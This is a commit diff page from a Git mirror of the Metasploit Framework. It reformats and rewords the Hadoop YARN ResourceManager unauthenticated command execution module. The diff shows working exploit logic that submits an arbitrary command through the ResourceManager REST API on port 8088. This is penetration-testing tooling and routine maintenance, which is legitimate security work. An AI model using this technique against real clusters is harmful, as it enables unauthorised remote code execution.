infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update mismatch indentation and others

GSoC/Meterpreter_Web_Console
Green-m 2018-07-01 22:43:07 -04:00
parent 492be19aa0
commit c3b71d4642
1 changed files with 10 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/linux/http/hadoop_unauth_exec.rb
View File

@ -9,11 +9,11 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager include Msf::Exploit::CmdStager
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Hadoop YARN ResourceManager Unauthorized Command Execution', 'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
'Description' => %q{ 'Description' => %q{
This module exploits an unauthorized command execution vulnerability in Apache Hadoop through ResourceManager REST API. This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -38,16 +38,14 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultTarget' => 0 'DefaultTarget' => 0
)) ))
register_options([ register_options([Opt::RPORT(8088)])
Opt::RPORT(8088)
])
end end
def check def check
res = send_request_cgi( res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'), 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST' 'method' => 'POST'
) )
unless res unless res
@ -69,8 +67,8 @@ class MetasploitModule < Msf::Exploit::Remote
def execute_command(cmd, opts = {}) def execute_command(cmd, opts = {})
res = send_request_cgi( res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'), 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST' 'method' => 'POST'
) )
app_id = res.get_json_document['application-id'] app_id = res.get_json_document['application-id']
@ -80,12 +78,12 @@ class MetasploitModule < Msf::Exploit::Remote
'application-name' => Rex::Text.rand_text_alpha_lower(4..12), 'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
'application-type' => 'YARN', 'application-type' => 'YARN',
'am-container-spec' => { 'am-container-spec' => {
'commands' => {'command' => "#{cmd}"}, 'commands' => {'command' => cmd.to_s},
} }
} }
res = send_request_cgi( res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'), 'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
'method' => 'POST', 'method' => 'POST',
'ctype' => 'application/json', 'ctype' => 'application/json',
'data' => post.to_json 'data' => post.to_json